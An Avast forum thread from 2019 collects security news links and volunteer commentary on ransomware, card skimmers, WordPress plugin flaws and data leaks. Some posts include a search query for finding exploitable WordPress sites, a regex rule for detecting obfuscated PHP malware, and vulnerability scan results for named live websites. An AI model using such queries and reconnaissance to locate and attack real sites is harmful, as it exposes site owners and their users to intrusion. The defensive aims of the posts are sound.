Google Wants To Block Potentially Risky Non-Secure Downloads
https://www.bleepingcomputer.com/news/security/google-wants-to-block-potentially-risky-non-secure-downloads/
-
New Extortion Email Threatens to Install WannaCry and DDoS Your Network
https://www.bleepingcomputer.com/news/security/new-extortion-email-threatens-to-install-wannacry-and-ddos-your-network/ (https://www.bleepingcomputer.com/news/security/new-extortion-email-threatens-to-install-wannacry-and-ddos-your-network/)
Check the post before repeating information.
https://forum.avast.com/index.php?topic=52252.msg1501600#msg1501600
-
Threat Group Uses Pastebin, GitHub In SneakyPastes Operation
https://www.bleepingcomputer.com/news/security/threat-group-uses-pastebin-github-in-sneakypastes-operation/
-
Popular Yuzo WordPress Plugin Exploited to Redirect Users to Scams
https://www.bleepingcomputer.com/news/security/popular-yuzo-wordpress-plugin-exploited-to-redirect-users-to-scams/
-
Office 365 Team Discovers Phishing Email Pushing WinRAR Exploit
https://www.bleepingcomputer.com/news/security/office-365-team-discovers-phishing-email-pushing-winrar-exploit/
-
VSDC Site Hacked Again to Spread Password Stealing Malware
https://www.bleepingcomputer.com/news/security/vsdc-site-hacked-again-to-spread-password-stealing-malware/
-
Hyperlink Auditing Pings Being Used to Perform DDoS Attacks
https://www.bleepingcomputer.com/news/security/hyperlink-auditing-pings-being-used-to-perform-ddos-attacks/
-
@ Snake,
Please don't turn this into a mirror of bleeping computers.
Flooding this forum with their security posts isn't exactly doing anything for this forum.
-
@ Snake,
Please don't turn this into a mirror of bleeping computers.
Flooding this forum with their security posts isn't exactly doing anything for this forum.
Ok.
-
'NamPoHyu Virus' Ransomware Targets Remote Samba Servers
https://www.bleepingcomputer.com/news/security/nampohyu-virus-ransomware-targets-remote-samba-servers/ (https://www.bleepingcomputer.com/news/security/nampohyu-virus-ransomware-targets-remote-samba-servers/)
-
Vulnerability in Multiple VPN Applications
https://www.us-cert.gov/ncas/current-activity/2019/04/12/Vulnerability-Multiple-VPN-Applications
https://kb.cert.org/vuls/id/192371/
-
Vulnerability in Multiple VPN Applications
https://www.us-cert.gov/ncas/current-activity/2019/04/12/Vulnerability-Multiple-VPN-Applications (https://www.us-cert.gov/ncas/current-activity/2019/04/12/Vulnerability-Multiple-VPN-Applications)
https://kb.cert.org/vuls/id/192371/ (https://kb.cert.org/vuls/id/192371/)
The only question I have, does this affect SecureLine and/or HMA (Hide My Ass)
-
Vulnerability in Multiple VPN Applications
https://www.us-cert.gov/ncas/current-activity/2019/04/12/Vulnerability-Multiple-VPN-Applications (https://www.us-cert.gov/ncas/current-activity/2019/04/12/Vulnerability-Multiple-VPN-Applications)
https://kb.cert.org/vuls/id/192371/ (https://kb.cert.org/vuls/id/192371/)
The only question I have, does this affect SecureLine and/or HMA (Hide My Ass)
Hi Bob, no - check the second link for details.
-
Vulnerability in Multiple VPN Applications
https://www.us-cert.gov/ncas/current-activity/2019/04/12/Vulnerability-Multiple-VPN-Applications (https://www.us-cert.gov/ncas/current-activity/2019/04/12/Vulnerability-Multiple-VPN-Applications)
https://kb.cert.org/vuls/id/192371/ (https://kb.cert.org/vuls/id/192371/)
The only question I have, does this affect SecureLine and/or HMA (Hide My Ass)
Hi Bob, no - check the second link for details.
Avast has acknowledged that their products aren't affected. Thanks
-
L.S.
Cisco, dozens of organizations fell victim to DNS-hijacking:
Read about this abuse: https://blog.talosintelligence.com/2019/04/seaturtle.html
and on how DNS settings are being changed by attackers:
https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html
An earlier warning:
https://www.us-cert.gov/ncas/current-activity/2019/01/10/DNS-Infrastructure-Hijacking-Campaign
warnings by the Department of Homeland Security,
polonus
-
Researcher Took Control of Microsoft's Live Tile Service, Defacement PoC Demoed
https://www.bleepingcomputer.com/news/security/researcher-took-control-of-microsofts-live-tile-service-defacement-poc-demoed/
-
Point Blank Gamers Targeted with Backdoor Malware
https://threatpost.com/gamers-pointblank-backdoor-malware/144088/ (https://threatpost.com/gamers-pointblank-backdoor-malware/144088/)
-
Hundreds of GoDaddy Accounts Used for "Miracle" Product Scams
https://www.bleepingcomputer.com/news/security/hundreds-of-godaddy-accounts-used-for-miracle-product-scams/ (https://www.bleepingcomputer.com/news/security/hundreds-of-godaddy-accounts-used-for-miracle-product-scams/)
-
Vulnerable Confluence Servers Get Infected with Ransomware, Trojans
https://www.bleepingcomputer.com/news/security/vulnerable-confluence-servers-get-infected-with-ransomware-trojans/ (https://www.bleepingcomputer.com/news/security/vulnerable-confluence-servers-get-infected-with-ransomware-trojans/)
GitHub-Hosted Magecart Card Skimmer Found on Hundreds of Stores
https://www.bleepingcomputer.com/news/security/github-hosted-magecart-card-skimmer-found-on-hundreds-of-stores/ (https://www.bleepingcomputer.com/news/security/github-hosted-magecart-card-skimmer-found-on-hundreds-of-stores/)
-
Docker Hub Database Hack Exposes Sensitive Data of 190K Users
https://www.bleepingcomputer.com/news/security/docker-hub-database-hack-exposes-sensitive-data-of-190k-users/ (https://www.bleepingcomputer.com/news/security/docker-hub-database-hack-exposes-sensitive-data-of-190k-users/)
-
I have been going on in the virus and worms on the insecurity of Word Press CMS based on php.
Especially how vulnerable plug-ins of the website software can be exploited by malcreants.
A new one, in a series of some 243 attacks over the latter years, Multi-Vector Attack in Server Logs,
read: https://labs.sucuri.net/?note=2019-03-25
Just too many results for this one, just 11 exploitables reported:
dork query //websites/GET+%2Fwp-admin%2Fadmin-post.php%3Fswp_debug%3Dload_options%26swp_url%3D/
detected -https://www.prensafutbol.cl/ -> Outdated software detected:
https://sitecheck.sucuri.net/results/https/www.prensafutbol.cl
= a high risk site with vulnerable mixed content!
polonus (volunteer 3rd party cold reconnaisance website security analyst and website error-hunter)
Read about the issue from Johanbnes Pille and others here: https://wordpress.stackexchange.com/questions/69549/define-wp-debug-conditionally-for-admins-only-log-errors-append-query-arg-f/69552
polonus
-
Europeans Hit with Multi-Stage Malware Loader via Signed Malspam
https://www.bleepingcomputer.com/news/security/europeans-hit-with-multi-stage-malware-loader-via-signed-malspam/ (https://www.bleepingcomputer.com/news/security/europeans-hit-with-multi-stage-malware-loader-via-signed-malspam/)
-
Urgent request to 60.000 vulnerable Word Press webshops to update plug-in
and disble a specific non-patched plug-in for the time being:
Immediately install: https://wordpress.org/support/topic/upgrade-to-4-3/
The plug-in involved that should be upgraded:
https://wordpress.org/plugins/woocommerce-checkout-manager/
Read on that particular attack campaign: https://labs.sucuri.net/?note=2019-03-25
Word Press kernel software, unless fully patched and not outdated is rather secure,
and comes checked by developers that maintain the code.
When configuring mind to set user enumeration to disabled as well as directory listing to disabled,
and see to it all your links are Google Safebrowsing OK-ed.
Word Press plug-ins should also be treated with extra care, keep them fully updated,
and remove the risky ones and certainly those left by developers,
as they won't get updates and in due time will form a grave risk
to website owners/admins, hosting parties and end-users alike.
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Update. From 13.30 hrs. to-day CET the developer came up with a new updated version 4.3,
Damian
-
The inception bar: a new phishing method
https://jameshfisher.com/2019/04/27/the-inception-bar-a-new-phishing-method/
https://9to5google.com/2019/04/28/chrome-android-exploit-fake-address-bar/
-
$1.75 Million Stolen by Crooks in Church BEC Attack
https://www.bleepingcomputer.com/news/security/175-million-stolen-by-crooks-in-church-bec-attack/
-
Report: Unknown Data Breach Exposes 80 Million US Households
https://www.vpnmentor.com/blog/report-millions-homes-exposed/
-
New Sodinokibi Ransomware Delivered via Oracle WebLogic Flaw
https://www.securityweek.com/new-sodinokibi-ransomware-delivered-oracle-weblogic-flaw
-
Oracle WebLogic-servers under attack from ransomeware since 25th of April.
Patch available from April 26th henceon,
Re: https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html
Patch and upgrade a.s.a.p.
polonus
-
Burger King leaked 38.000 customer data through unprotected publicly available Elasticsearch database:
Read: https://securitydiscovery.com/burger-kings-online-shop-for-kids-exposed-data/ (source Bob Diachenko).
Example of a resource that has adequate protection:
http://156.235.224.95/ met Protected Elastiscearch with password protection on log-in
or protected through Kibana. See: https://www.elastic.co/guide/en/x-pack/current/elasticsearch-security.html
That is the least Burger King customers should expect there to be.
No there are handy little specific searchscripts to be used on Shodan: like LeakLooker
to find unprotected open MongoDB, CouchDB and Elasticsearch databases.
However a website may contain unprotected open resources,
intruders cannot visit such unprotected to access Elastisearch databases,
that is illegal and punishable conduct.
"When you see some veranda doors open at the porch, this does not mean it is an invitation to enter".
Good Bob Diachenko disclosed this situation.
On the other hand it is a shame for Burger King to have such unprotected open databases in the first place.
The database has now been adequately protected.
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
-
Local Authorities in Texas and Maryland Hit by Ransomware
https://www.bleepingcomputer.com/news/security/local-authorities-in-texas-and-maryland-hit-by-ransomware/ (https://www.bleepingcomputer.com/news/security/local-authorities-in-texas-and-maryland-hit-by-ransomware/)
-
Dharma Ransomware Uses Legit Antivirus Tool To Distract Victims
https://www.bleepingcomputer.com/news/security/dharma-ransomware-uses-legit-antivirus-tool-to-distract-victims/ (https://www.bleepingcomputer.com/news/security/dharma-ransomware-uses-legit-antivirus-tool-to-distract-victims/)
-
Thousands of webshops leak customer data:
https://publicwww.com/websites/%22assets.pcrl.co%22/
polonus
-
All 3rd parties involved and why a transaction was not realized: https://www.mupload.nl/img/fqxx4rszg0.jpg
Is src=//assets.pcrl.co/js/jstracker.min.js to denote the webshop javascript could be compromised?
See: -https://github.com/LinusHenze/WebKit-RegEx-Exploit
PHP based CMS with manipulated JavaScript is lively dangerous,
Example: https://www.virustotal.com/#/file/48eb8b500ae6a38617b5738d2b3faec481922a7782246e31d2755c034a45cd5d/community
re: https://aw-snap.info/file-viewer/?protocol=secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=XiNuLmd7fH1wfHR9XWwuXl1t~enc
polonus
-
Hackers Inject Magecart Card Skimmer in Forbes’ Subscription Site
https://www.bleepingcomputer.com/news/security/hackers-inject-magecart-card-skimmer-in-forbes-subscription-site/ (https://www.bleepingcomputer.com/news/security/hackers-inject-magecart-card-skimmer-in-forbes-subscription-site/)
-
The latest cybercriminal trend next to ransomeware is third party (obfuscated) javascript injection by malcreants to get to victim data,
so-called form jacking:
Read: https://news.netcraft.com/archives/2019/05/14/french-jewellery-chain-cleor-falls-victim-to-skimming-attack.html
The attackers operate from a type-squatted domain and extract user data from signing out pay pages,
which are being send to a server under their control.
SRI & CSP and other security header installs can greatly protect against such attacks.
One should also scan and validate: https://github.com/gwillem/magento-malware-scanner
But other scanning should also be brought in next to regular expression rule scanning like
snippet
rule obfuscated eval {
strmp: $ = /\\x65\5*\\x76\s* \\x61\5*\S* \\x6c/condition any of them (see https://pastebin.com/aUuN7v7S)
end snippet
source willemg 88 lines in all.
See what a good php scanner script should be up against: https://pastebin.com/aUuN7v7S
and what you need beside this to deobfuscate, e.g. :
http://ddecode.com/hexdecoder/?results=82d5a427fa502e3a5652e15a9602da48
So protection can be had, when security is not a last resort thing and a sort of low level robot.txt like :o
polonus (volunteer 3rd party cold reconnaissance website analyst and website error hunter)
-
L.S.
And why CSP has not been correctly installed all over the cloud at Cloudflare's,
now that form-jacking gains more and more momentum?
Re: https://observatory.mozilla.org/analyze/cdnjs.cloudflare.com
A minimal D-status is a shame really.
Content Security Policy (CSP) implemented unsafely.
This includes 'unsafe-inline' or data: inside script-src, overly broad sources such as
"https: inside object-src or script-src, or not restricting the sources for object-src or script-src".
And here Cloudflare cannot do better as comin' up with a meagre C grade,
See: https://tls.imirhil.fr/https/cdnjs.cloudflare.com
They won't go that extrt security mile for their end-users, just implementing,
what they can get away with I presume?
This will mean, that we won't see that last webshop being hacked by form-hacking attackers there soon,
that's for sure. A shame really, isn't it?
polonus (volunteer 3rd party cold reconnaissance website security analyst ans error-hunter)
-
Needed now Lets Encrypt transparency log?
-> read https://www.theregister.co.uk/2019/05/15/lets_encrypt_ct_log/
Will it make a big difference with malcreants?
pol
-
It's everywhere. Data collection!
https://www.cnn.com/2019/05/20/politics/dhs-chinese-drone-warning/index.html (https://www.cnn.com/2019/05/20/politics/dhs-chinese-drone-warning/index.html)
-
Google Stored Unhashed G Suite Passwords for Over a Decade
https://www.bleepingcomputer.com/news/security/google-stored-unhashed-g-suite-passwords-for-over-a-decade/
https://cloud.google.com/blog/products/g-suite/notifying-administrators-about-unhashed-password-storage
-
Sectigo Responds to Chronicle's Report About Malware Signed by Their Certs
https://www.bleepingcomputer.com/news/security/sectigo-responds-to-chronicles-report-about-malware-signed-by-their-certs/ (https://www.bleepingcomputer.com/news/security/sectigo-responds-to-chronicles-report-about-malware-signed-by-their-certs/)
-
Notice of Security Incident
https://about.flipboard.com/support-information-incident-may-2019/
-
YouTube Cryptocurrency Videos Pushing Info-Stealing Trojan
https://www.bleepingcomputer.com/news/security/youtube-cryptocurrency-videos-pushing-info-stealing-trojan/
-
YouTube Cryptocurrency Videos Pushing Info-Stealing Trojan
https://www.bleepingcomputer.com/news/security/youtube-cryptocurrency-videos-pushing-info-stealing-trojan/ (https://www.bleepingcomputer.com/news/security/youtube-cryptocurrency-videos-pushing-info-stealing-trojan/)
This scam is the same as most and promises something for nothing. (Bitcoins)
It usually works on those that are greedy and doesn't work on us rational and cautious types. :)
-
ShadowHammer: Malicious updates for ASUS laptops
https://www.kaspersky.com/blog/shadow-hammer-teaser/26149/
https://securelist.com/operation-shadowhammer/89992/
https://www.virustotal.com/gui/file/bebb16193e4b80f4bc053e4fa818aa4e2832885392469cd5b8ace5cec7e4ca19/detection
-
Maze Ransomware Says Computer Type Determines Ransom Amount
https://www.bleepingcomputer.com/news/security/maze-ransomware-says-computer-type-determines-ransom-amount/ (https://www.bleepingcomputer.com/news/security/maze-ransomware-says-computer-type-determines-ransom-amount/)
-
GandCrab Ransomware Shutting Down After Claiming to Earn $2.5 Billion
https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-shutting-down-after-claiming-to-earn-25-billion/ (https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-shutting-down-after-claiming-to-earn-25-billion/)
-
BlackSquid Uses 7 Exploits to Infect Web Servers with Miners
https://www.bleepingcomputer.com/news/security/blacksquid-uses-7-exploits-to-infect-web-servers-with-miners/ (https://www.bleepingcomputer.com/news/security/blacksquid-uses-7-exploits-to-infect-web-servers-with-miners/)
-
Windows 10 Apps Hit by Malicious Ads that Blockers Won't Stop
https://www.bleepingcomputer.com/news/security/windows-10-apps-hit-by-malicious-ads-that-blockers-wont-stop/
-
Windows 10 Apps Hit by Malicious Ads that Blockers Won't Stop
https://www.bleepingcomputer.com/news/security/windows-10-apps-hit-by-malicious-ads-that-blockers-wont-stop/ (https://www.bleepingcomputer.com/news/security/windows-10-apps-hit-by-malicious-ads-that-blockers-wont-stop/)
Simple solution, do not install add-supported apps.
-
AMCA Breach Hits 12 Million Quest Diagnostics Patients
https://www.securityweek.com/amca-breach-hits-12-million-quest-diagnostics-patients (https://www.securityweek.com/amca-breach-hits-12-million-quest-diagnostics-patients)
-
AMCA Breach Hits 12 Million Quest Diagnostics Patients
https://www.securityweek.com/amca-breach-hits-12-million-quest-diagnostics-patients (https://www.securityweek.com/amca-breach-hits-12-million-quest-diagnostics-patients)
Good thing my insurance co. doesn't cover Quest. so, I avoided this one. :)
-
Cryptojacking campaign strikes China with fileless attacks
https://www.zdnet.com/article/cryptojacking-campaign-strikes-china-with-fileless-attacks/ (https://www.zdnet.com/article/cryptojacking-campaign-strikes-china-with-fileless-attacks/)
-
Wajam: From start-up to massively-spread adware
https://www.welivesecurity.com/2019/06/05/wajam-startup-massively-spread-adware/ (https://www.welivesecurity.com/2019/06/05/wajam-startup-massively-spread-adware/)
-
New GoldBrute Botnet is Trying to Hack 1.5 Million RDP Servers
https://www.bleepingcomputer.com/news/security/new-goldbrute-botnet-is-trying-to-hack-15-million-rdp-servers/ (https://www.bleepingcomputer.com/news/security/new-goldbrute-botnet-is-trying-to-hack-15-million-rdp-servers/)
-
New GoldBrute Botnet is Trying to Hack 1.5 Million RDP Servers
https://www.bleepingcomputer.com/news/security/new-goldbrute-botnet-is-trying-to-hack-15-million-rdp-servers/ (https://www.bleepingcomputer.com/news/security/new-goldbrute-botnet-is-trying-to-hack-15-million-rdp-servers/)
It's hard to be first. https://forum.avast.com/index.php?topic=66267.msg1508386#msg1508386
:)
-
New Extortion Scam Threatens to Ruin a Website's Reputation
https://www.bleepingcomputer.com/news/security/new-extortion-scam-threatens-to-ruin-a-websites-reputation/ (https://www.bleepingcomputer.com/news/security/new-extortion-scam-threatens-to-ruin-a-websites-reputation/)
-
Major HSM vulnerabilities impact banks, cloud providers, governments
https://www.zdnet.com/article/major-hsm-vulnerabilities-impact-banks-cloud-providers-governments/ (https://www.zdnet.com/article/major-hsm-vulnerabilities-impact-banks-cloud-providers-governments/)
-
WordPress Chat Plugin Bug Lets Hackers Inject Text, Steal Logs
https://www.bleepingcomputer.com/news/security/wordpress-chat-plugin-bug-lets-hackers-inject-text-steal-logs/ (https://www.bleepingcomputer.com/news/security/wordpress-chat-plugin-bug-lets-hackers-inject-text-steal-logs/)
-
RAMBleed Attack Can Steal Sensitive Data From Computer Memory
https://www.bleepingcomputer.com/news/security/rambleed-attack-can-steal-sensitive-data-from-computer-memory/ (https://www.bleepingcomputer.com/news/security/rambleed-attack-can-steal-sensitive-data-from-computer-memory/)
Bad Cert Vulnerability Can Bring Down Any Windows Server
https://www.bleepingcomputer.com/news/security/bad-cert-vulnerability-can-bring-down-any-windows-server/ (https://www.bleepingcomputer.com/news/security/bad-cert-vulnerability-can-bring-down-any-windows-server/)
New Version of ShellTea Backdoor Used by FIN8 Hacking Group
https://www.securityweek.com/new-version-shelltea-backdoor-used-fin8-hacking-group (https://www.securityweek.com/new-version-shelltea-backdoor-used-fin8-hacking-group)
-
Important to have proper back-end security on Magento webshop sites.,
hundreds of which have been compromised lately:
https://sansec.io/labs/2019/05/10/magento-2-hacks/
because the cybercriminals automated these hacks to quite an extent:
https://twitter.com/gwillem/status/1138818632409145344
In such cases it is best to have additional security measures taken,
cloudhosting and hiding your back-end to attackers,
an example: cloudflare//support.coudflare.com -> http://sitemeer.com/# HTTPS://www.interviewcoder: in 8443
IP 83.217.93.87: 8080 or 8880 https app deployment on Cloudflare,
in this case check shodan.io not for weaknesses but in stead for stabler security (pol)
website: https://hairsuite.nl:8443
Foud retirable jQuery libraries: Retire.js
jquery-ui-dialog 1.10.4 Found in -https://hairsuite.nl:8443/static/version1559290779/base/Magento/base/default/jquery/jquery-ui.js
Vulnerability info:
High CVE-2016-7103 281 XSS Vulnerability on closeText option 123
jquery 1.12.4 Found in -https://hairsuite.nl:8443/static/version1559290779/base/Magento/base/default/jquery/jquery.min.js
Vulnerability info:
Medium 2432 3rd party CORS request may execute CVE-2015-9251 1234
Medium CVE-2015-9251 11974 parseHTML() executes scripts in event handlers 123
Medium CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution
Compare: https://www.magereport.com/scan/?s=https://hairsuite.nl:s/
outside of the store not much to be scanned
Security Checks for -https://hairsuite.nl
(3) Susceptible to man-in-the-middle attacks
Vulnerable to cross-site attacks
DNS is susceptible to man-in-the-middle attacks
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
-
Fake news or real existing cyber-threat against the Russian astralinux-grid?
http://wiki.dataved.ru/6/h/t -> https://scaner-vs.ru/version-for-testing/
part of threats described at:
https://download.geo.drweb.com/pub/drweb/unix/workstation/11.1/documentation/html/en/index.html?dw_8_app_a_threat_types.htm
vim exploitable - http://download.astralinux.ru/astra/stable/orel/repository/pool/main/v/vim/
https://www.cybersecurity-review.com/news-june-2019/your-linux-can-get-hacked-just-by-opening-a-file-in-vim-or-neovim-editor/
https://www.reddit.com/r/vim/comments/bwp7q3/code_execution_vulnerability_in_vim_811365_and/
source credits go out to: luntrus
Consider also: https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md
Patches: https://github.com/vim/vim/commit/5357552 & https://github.com/neovim/neovim/pull/10082
Beyond patching, it's recommended to disable modelines in the vimrc (set nomodeline), to use the securemodelines plugin, or to disable modelineexpr (since patch 8.1.1366, Vim-only) to disallow expressions in modelines.
Check if you have modelines enabled by opening vim and entering
:set modeline?
If vim returns nomodeline, you are not vulnerable.
If you are vulnerable or want to ensure your security with this issue, add these lines to your vimrc:
set modelines=0
set nomodeline
quote credits go to Arminias (@rawsec)
polonus (volunteer 3rd party cold reconnaissance website security analyst & website error-hunter)
-
Kaspersky about OS hardening and steering away recently from Microsoft to Astralinux...
Read: https://securelist.com/features-of-secure-os-realization/77469/
To improve security, tools that make it more difficult to exploit some vulnerabilities,
including those inherent in the system due to its insecure original design, can be built into the system.
Examples include: Grsecurity, AppArmor, Hardened Gentoo, Atlix, YANUX, and Astra Linux, etc.
Weird is that none of the MS evangelists here reacts. Well in this respect.
Why the Russian Federation may have taken such actions to harden their grid-base,
switching from MS-Windows towards military strength astralinux for their critical systems?
Seems the world again comes "split in two, or maybe three or four (Anglo-US, EU, Russian Federation, Mainland China).
Remember the song lyrics: "The Russian spy and I, we both wonder why, the world is split in two"?
polonus
-
DanaBot Banking Trojan Upgraded with ‘Non Ransomware’ Module
https://www.bleepingcomputer.com/news/security/danabot-banking-trojan-upgraded-with-non-ransomware-module/ (https://www.bleepingcomputer.com/news/security/danabot-banking-trojan-upgraded-with-non-ransomware-module/)
Turla Espionage Group Hacks OilRig APT Infrastructure
https://www.bleepingcomputer.com/news/security/turla-espionage-group-hacks-oilrig-apt-infrastructure/ (https://www.bleepingcomputer.com/news/security/turla-espionage-group-hacks-oilrig-apt-infrastructure/)
Ryuk Ransomware Adds IP and Computer Name Blacklisting
https://www.bleepingcomputer.com/news/security/ryuk-ransomware-adds-ip-and-computer-name-blacklisting/ (https://www.bleepingcomputer.com/news/security/ryuk-ransomware-adds-ip-and-computer-name-blacklisting/)
Desjardins Group Data Leak Exposes Info of 2.9 Million Members
https://www.bleepingcomputer.com/news/security/desjardins-group-data-leak-exposes-info-of-29-million-members/ (https://www.bleepingcomputer.com/news/security/desjardins-group-data-leak-exposes-info-of-29-million-members/)
-
U.S. Government Warns of Data Wipers Used in Iranian Cyberattacks
https://www.bleepingcomputer.com/news/security/us-government-warns-of-data-wipers-used-in-iranian-cyberattacks/
-
OPERATION SOFT CELL: A WORLDWIDE CAMPAIGN AGAINST TELECOMMUNICATIONS PROVIDERS
https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers
https://www.theregister.co.uk/2019/06/25/global_telcos_hacked/
https://techcrunch.com/2019/06/24/hackers-cell-networks-call-records-theft/?guccounter=1&guce_referrer_us=aHR0cHM6Ly93d3cuZGlnaS5uby9hcnRpa2xlci9hdnNsb3J0ZS1tYXNzaXYtaGFja2Vya2FtcGFuamUtbW90LWVuLXJla2tlLW1vYmlsb3BlcmF0b3Jlci80Njg1MDg&guce_referrer_cs=wYDG-7wEeaqSkqtSwJ2RvQ
-
Where address obscurity was meant to be your security for public buckets.
Read: https://www.upguard.com/breaches/attunity-data-leak
So no longer secure as there are search engines now to find these public buckets,
which could otherwise come without protection: https://buckets.grayhatwarfare.com/
Really some insecurity lingers on the Interwebz, folks, it sure does.
Some search example for bootstrap.js:
https://buckets.grayhatwarfare.com/results/bootstrap.js
And some results are not secure: -https://tempdev.s3-us-west-2.amazonaws.com/assets/bower_components/bootstrap/dist/js/bootstrap.js
Detected libraries:
bootstrap - 3.3.7 : -https://tempdev.s3-us-west-2.amazonaws.com/assets/bower_components/bootstrap/dist/js/bootstrap.js
Info: Severity: high
https://github.com/twbs/bootstrap/issues/28236
Info: Severity: medium
https://github.com/twbs/bootstrap/issues/20184
Info: Severity: medium
https://github.com/twbs/bootstrap/issues/20184
Info: Severity: medium
https://github.com/twbs/bootstrap/issues/20184
1 vulnerable library detected
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
P.S. Just fiddle a bit around and via cache data you'll get at:
https://webcache.googleusercontent.com/search?q=cache:9hT4lE0DjLUJ:www.smkmuhkandanghaur.sch.id/assets/bower_components/Ionicons/src/+&cd=2&hl=pl&ct=clnk&gl=us&client=avast
Damian
-
FBI Releases Warning on Sextortion Scams Targeting Teenagers
https://www.bleepingcomputer.com/news/security/fbi-releases-warning-on-sextortion-scams-targeting-teenagers/
-
Beware of Fake Microsoft OneNote Audio Note Phishing Emails
https://www.bleepingcomputer.com/news/security/beware-of-fake-microsoft-onenote-audio-note-phishing-emails/
-
962 Magento webshops hit through formjacking:
Re: https://www.bleepingcomputer.com/news/security/automated-magecart-campaign-hits-over-960-breached-stores/
Re: https://gist.github.com/gwillem/5d936f5a84837d5c1dcb488ce256294a (the decoded script)
Webshop owners and store-site maintainers should scan here: https://www.magereport.com/scan/
Often the cause of this is sloppy update & patch routines for both Magento CMS and themes and plug-ins.
polonus
-
25 Million Android Phones Infected.
Is your Whatsapp kicking up adverts? You are probably being infected.
Read: https://www.forbes.com/sites/thomasbrewster/2019/07/10/25-million-android-phones-infected-with-malware-that-hides-in-whatsapp/
polonus
-
Hackers Infect Pale Moon Archive Server With a Malware Dropper
https://www.bleepingcomputer.com/news/security/hackers-infect-pale-moon-archive-server-with-a-malware-dropper/
-
Sad news
Bye bye
<?php
echo "# ZeuS Tracker has been discontinued on Jul 8th, 2019";
exit();
?>
polonus
-
Avast researchers find apparent Android app scam
https://blog.avast.com/avast-researcher-finds-apparent-android-app-scam
-
FBI Releases Master Decryption Keys for GandCrab Ransomware
https://www.bleepingcomputer.com/news/security/fbi-releases-master-decryption-keys-for-gandcrab-ransomware/
-
Twitter Can be Tricked Into Showing Misleading Embedded Links
https://www.bleepingcomputer.com/news/security/twitter-can-be-tricked-into-showing-misleading-embedded-links/
-
Spamhouse considers Cloudflare as a privileged botnet-server-hoster.
Cloudflare listed as the number 1 hoster of C&C servers.
https://www.spamhaus.org/news/article/785/spamhaus-botnet-threat-update-q2-2019
polonus
-
Spamhouse considers Cloudflare as a privileged botnet-server-hoster.
Cloudflare listed as the number 1 hoster of C&C servers.
https://www.spamhaus.org/news/article/785/spamhaus-botnet-threat-update-q2-2019
polonus
This isn't particularly surprising when you consider just how big Cloudflare is.
As I use uMatrix (and uBlock Origin) in my Firefox browsers, I see just how many sites have connections to Cloudflare.
Though like other hosting services I would be expecting them to be taking positive action to prevent this type of action. I guess we live in different worlds.
-
Re: https://www.wordfence.com/blog/2019/07/recent-wordpress-vulnerabilities-targeted-by-malvertising-campaign/
Advice: update and patch.
polonus
-
El Paso and Dayton Tragedy-Related Scams and Malware Campaigns
https://www.us-cert.gov/ncas/current-activity/2019/08/06/el-paso-and-dayton-tragedy-related-scams-and-malware-campaigns
-
El Paso and Dayton Tragedy-Related Scams and Malware Campaigns
https://www.us-cert.gov/ncas/current-activity/2019/08/06/el-paso-and-dayton-tragedy-related-scams-and-malware-campaigns (https://www.us-cert.gov/ncas/current-activity/2019/08/06/el-paso-and-dayton-tragedy-related-scams-and-malware-campaigns)
Since these tragedies are being used to raise funds for political purposes, why not exploit them to make money.
That's unfortunately the world we live in today. Where is my Commodore Vic 20 ???
-
An issue with your settings choices related to ads on Twitter
https://help.twitter.com/en/ads-settings
-
29 VPN services in the hands of 6 China-Based Organizations: :
https://www.infosecurity-magazine.com/news/29-vpn-services-owned-by-six/
....a lot of these VPN apps harvest your personal data.
The top 97 VPN services are owned by just only 23 parent companies,
polonus
-
Say Cheese: Ransomware-ing a DSLR Camera
https://research.checkpoint.com/say-cheese-ransomware-ing-a-dslr-camera/
-
Back-to-Back Campaigns: Neko, Mirai, and Bashlite Malware Variants Use Various Exploits to Target Several Routers, Devices
https://blog.trendmicro.com/trendlabs-security-intelligence/back-to-back-campaigns-neko-mirai-and-bashlite-malware-variants-use-various-exploits-to-target-several-routers-devices/
-
Google guru shows how WinXP-era text code grants total control
https://www.theregister.co.uk/2019/08/13/windows_notepad_flaw/
-
Microsoft warns Windows 10 users to update immediately
https://www.cnn.com/2019/08/14/tech/windows-10-microsoft-security-update-trnd/index.html (https://www.cnn.com/2019/08/14/tech/windows-10-microsoft-security-update-trnd/index.html)
-
HTTP/2 Denial of Service Advisory
https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-002.md
https://www.kb.cert.org/vuls/id/605641/
-
Security Bulletin: NVIDIA GPU Display Driver - August 2019
https://nvidia.custhelp.com/app/answers/detail/a_id/4841
-
BEC Scam Costing Almost US$11 Million Leads to FBI Arrest of Nigerian Businessman
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/bec-scam-costing-almost-us-11-million-leads-to-fbi-arrest-of-nigerian-businessman
-
One down,1000 more to go.
-
Almost everyday now new insecurity detected with plug-ins on the PHP driven WordPress CMS.
Please folks update, patch, disable user enumeration and set directory listing to disabled.
Use some from of validation like CSP (Content Security Policy header),
also scan for SQL and DOM-XSS vulnerabilities in the plug-in code.
Read: 1.5 million users could be affected: https://www.fortinet.com/blog/threat-research/wordpress-plugin-sql-injection-vulnerability.html
also: https://www.wordfence.com/blog/2019/08/malicious-wordpress-redirect-campaign-attacking-several-plugins/
polonus
-
List of affected WP plug-ins:
Voor wie niet verder wil zoeken, het gaat om dit lijstje:
WordPress.AJDGSolutions.AdRotate.SQL.Injection
WordPress.Adenion.Blog2Social.SQL.Injection
WordPress.Icegram.EmailSubscribers.SQL.Injection
WordPress.WPEverest.EverestForms.SQL.Injection
WordPress.FolioVision.FlowplayerVideoPlayer.SQL.Injection
WordPress.Impress.Give.SQL.Injection
WordPress.Imagely.NextGENGallery.SQL.Injection
WordPress.10Web.PhotoGallery.SQL.Injection
WordPress.Sygnoos.PopupBuilder.SQL.Injection
po;onus
-
